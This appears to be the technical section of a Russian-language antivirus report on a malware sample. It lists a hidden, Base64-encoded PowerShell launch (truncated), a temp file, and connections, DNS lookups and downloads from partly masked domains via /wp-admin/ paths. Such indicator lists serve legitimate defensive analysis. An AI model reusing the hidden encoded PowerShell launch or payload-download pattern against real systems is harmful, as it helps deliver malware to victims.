Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGUAZAB1AGEAegB5AG8APQAnAEUAdwBsAHYAYQBiAG8AZABsACcAOwAkAEEAdgBuAHYAdgB0AG8AbQAgAD0AIAAnADcAMAA1ACcAOwAkAFMAcQBwAHYAcgB2AG8AdQBrAHcAcAA9ACcAQwBhAHIAbQBiAHYAcgB3AHcAeQBkACcAOwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\869346.cvr
- 'ii###anta.com':80
- 'gr####dwhite.com':80
- 'gr####dwhite.com':443
- http://ii###anta.com/wp-admin/joABbF/
- http://gr####dwhite.com/wp-admin/9/
- 'gr####dwhite.com':443
- DNS ASK me###.##jaminstitute.com
- DNS ASK ek###adona.com
- DNS ASK ii###anta.com
- DNS ASK wo##n.info
- DNS ASK gr####dwhite.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGUAZAB1AGEAegB5AG8APQAnAEUAdwBsAHYAYQBiAG8AZABsACcAOwAkAEEAdgBuAHYAdgB0AG8AbQAgAD0AIAAnADcAMAA1ACcAOwAkAFMAcQBwAHYAcgB2AG8AdQBrAHcAcAA9ACcAQwBhAHIAbQBiAHYAcgB3AHcAeQBkACcAOwA...' (со скрытым окном)